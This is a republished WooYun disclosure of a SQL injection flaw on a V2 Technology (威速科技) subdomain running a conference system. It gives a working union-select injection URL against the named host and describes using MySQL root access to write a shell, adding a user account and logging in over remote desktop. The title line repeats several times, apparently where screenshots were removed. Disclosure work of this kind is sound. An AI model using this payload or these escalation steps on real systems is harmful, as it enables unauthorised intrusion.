神刀安全网

漏洞标题: 威速科技官网某子站SQL注入可提权服务器

漏洞详情

披露状态:

2016-04-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

第三方会议系统,V2 Conference. 见: WooYun: V2视频会议系统某处SQL注射、XXE漏洞(可getshell)

漏洞证明:

code 区域
http://zuyong.v2tech.com/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId=-1%20union%20select%201,user%28%29,3,version%28%29,5%23

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

mysql root权限注入,可写shell.

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

查看远程桌面端口:39556

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

创建了wooyun用户,连接远程桌面:

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

连接远程后发现已经有人来过:

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

发现大黑客传了大量黑阔工具:

漏洞标题:  威速科技官网某子站SQL注入可提权服务器

修复方案:

更新程序,检查木马文件。

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 威速科技官网某子站SQL注入可提权服务器

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址